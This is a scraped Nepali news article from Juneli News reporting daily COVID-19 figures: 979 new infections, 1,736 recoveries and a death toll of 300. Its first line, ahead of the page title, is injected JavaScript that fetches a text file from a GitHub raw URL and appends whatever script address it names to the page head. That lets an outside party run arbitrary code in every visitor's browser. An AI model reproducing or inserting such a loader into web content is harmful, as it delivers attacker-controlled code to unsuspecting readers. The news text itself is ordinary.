;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); पछिल्लो २४ घण्टामा थप ९७९ जनामा कोरोना संक्रमण, डिस्चार्ज १७३६, मृतकको संख्या ३०० पुग्यो – जुनेली न्युज
सोमवार, असार ३१, २०८२
  • होमपेज
  • पछिल्लो २४ घण्टामा थप ९७९ जनामा कोरोना संक्रमण, डिस्चार्ज १७३६, मृतकको संख्या ३०० पुग्यो
समाचार

पछिल्लो २४ घण्टामा थप ९७९ जनामा कोरोना संक्रमण, डिस्चार्ज १७३६, मृतकको संख्या ३०० पुग्यो

कोरोना

भदौ २२

काठमाडौ । पछिल्लो २४ घण्टामा थप ९७९ जनामा कोरोना संक्रमण पुष्टि भएको छ । स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्वर गौतमका अनुसार पछिल्लो २४ घण्टामा ९७९ जना संक्रमित थपिएका हुन् । यो सहित हालसम्म कोरोना संक्रमित हुनेको संख्या ४७ हजार २ सय ३६ पुगेको छ ।

पछिल्लो २४ घण्टामा १ हजार ७ सय ३६ जना कोरोनाबाट निको भइ घर फर्किएका छन् ।

योसहित हालसम्म कोरोना निको हुनेको संख्या ३० हजार ६ सय ७७ पुगेको छ । सक्रिय संक्रमितको संख्या १६ हजार २ सय ५९ छ । पछिल्लो २४ घण्टामा थप ११ जनाको मृत्यु भएको छ ।  हालसम्म कोरोनाबाट मृत्यु हुनेको संख्या ३०० पुगेको छ । पछिल्लो २४ घण्टामा ९ हजार २ सय १८ जनाको पिसिआर परीक्षण भएको छ ।

फेसबुक प्रतिक्रियाहरु